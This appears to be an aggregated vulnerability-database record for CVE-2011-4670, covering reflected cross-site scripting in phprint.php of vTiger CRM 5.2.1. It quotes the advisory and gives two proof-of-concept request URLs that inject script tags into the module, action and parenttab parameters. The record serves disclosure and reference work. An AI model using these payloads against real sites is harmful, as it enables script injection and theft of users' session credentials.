ID

VAR-E-201110-0022


CVE

cve_id:CVE-2011-4670

Trust: 1.9

sources: BID: 49927 // EXPLOIT-DB: 36204 // EDBNET: 57561

EDB ID

36204


TITLE

vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36204

DESCRIPTION

vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities. CVE-2011-4670, CVE-76006. Webapps exploit for PHP platform.

Trust: 0.6

sources: EXPLOIT-DB: 36204

AFFECTED PRODUCTS

vendor: vtiger, model: crm, scope: eq, version: 5.2.1

Trust: 1.3

sources: BID: 49927 // EXPLOIT-DB: 36204

EXPLOIT

source: https://www.securityfocus.com/bid/49927/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.

/phprint.php?module=Home&action=--><script>alert(/xss/)</script>&parenttab=MyHome Page"><script>alert(0)</script>&jt=

/phprint.php?module=--><script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=

Trust: 1.0

sources: EXPLOIT-DB: 36204

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36204

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36204

TYPE

'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 36204

CREDITS

Aung Khant

Trust: 0.6

sources: EXPLOIT-DB: 36204

EXTERNAL IDS

db: NVD, id: CVE-2011-4670

Trust: 1.9

db: EXPLOIT-DB, id: 36204

Trust: 1.9

db: BID, id: 49927

Trust: 1.9

db: EDBNET, id: 57561

Trust: 0.6

sources: BID: 49927 // EXPLOIT-DB: 36204 // EDBNET: 57561

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-4670

Trust: 1.6

url:https://www.securityfocus.com/bid/49927/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/36204/

Trust: 0.6

url:https://www.exploit-db.com/exploits/36203

Trust: 0.3

url:https://www.exploit-db.com/exploits/36204

Trust: 0.3

url:http://seclists.org/fulldisclosure/2011/oct/154

Trust: 0.3

sources: BID: 49927 // EXPLOIT-DB: 36204 // EDBNET: 57561

SOURCES

db: BID, id: 49927
db: EXPLOIT-DB, id: 36204
db: EDBNET, id: 57561

LAST UPDATE DATE

2022-07-27T09:30:28.118000+00:00


SOURCES UPDATE DATE

db: BID, id: 49927, date: 2011-12-06T19:37:00

SOURCES RELEASE DATE

db: BID, id: 49927, date: 2011-10-04T00:00:00
db: EXPLOIT-DB, id: 36204, date: 2011-10-04T00:00:00
db: EDBNET, id: 57561, date: 2011-10-04T00:00:00